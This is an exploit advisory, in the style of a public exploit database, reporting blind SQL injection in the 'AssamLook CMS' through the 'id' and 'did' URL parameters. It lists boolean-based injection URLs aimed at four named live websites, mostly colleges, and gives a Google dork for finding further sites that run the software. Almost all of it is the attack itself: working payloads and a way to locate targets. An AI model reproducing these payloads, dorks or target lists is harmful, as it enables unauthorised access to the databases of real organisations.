*********************************************************
# Exploit Title: AssamLook CMS - Blind SQL Injection Vulnerabilities
# Date: 2025-04-30
# Exploit Author: AmirHossein Abdollahi | Mr_Amir_Typer
# Google Dork: intext:"Powered By Assamlook.com"
# Category: WebApps
# Tested On: Windows, Firefox
*********************************************************
[+] Vulnerable Parameter: `id` or `did` in URLs with `.php?id=` or `.php?did=`
*********************************************************
### Demo 1:
https://rhinoprintopacks.com/product.php?id=53' and 1=1--+
https://rhinoprintopacks.com/product.php?id=53' and 1=2--+
### Demo 2:
https://www.nonoicollege.in/department-profile.php?did=1' and 1=1--+
https://www.nonoicollege.in/department-profile.php?did=1' and 1=2--+
### Demo 3:
https://rahacollege.co.in/department-profile.php?did=3' and 1=1--+
https://rahacollege.co.in/department-profile.php?did=3' and 1=2--+
### Demo 4:
https://www.lumdingcollege.org/view_tender.php?id=108' and 1=1--+
https://www.lumdingcollege.org/view_tender.php?id=108' and 1=2--+
*********************************************************
[+] Google Dork:
intext:"Powered By Assamlook.com"
*********************************************************
# Discovered by: AmirHossein Abdollahi | Mr_Amir_Typer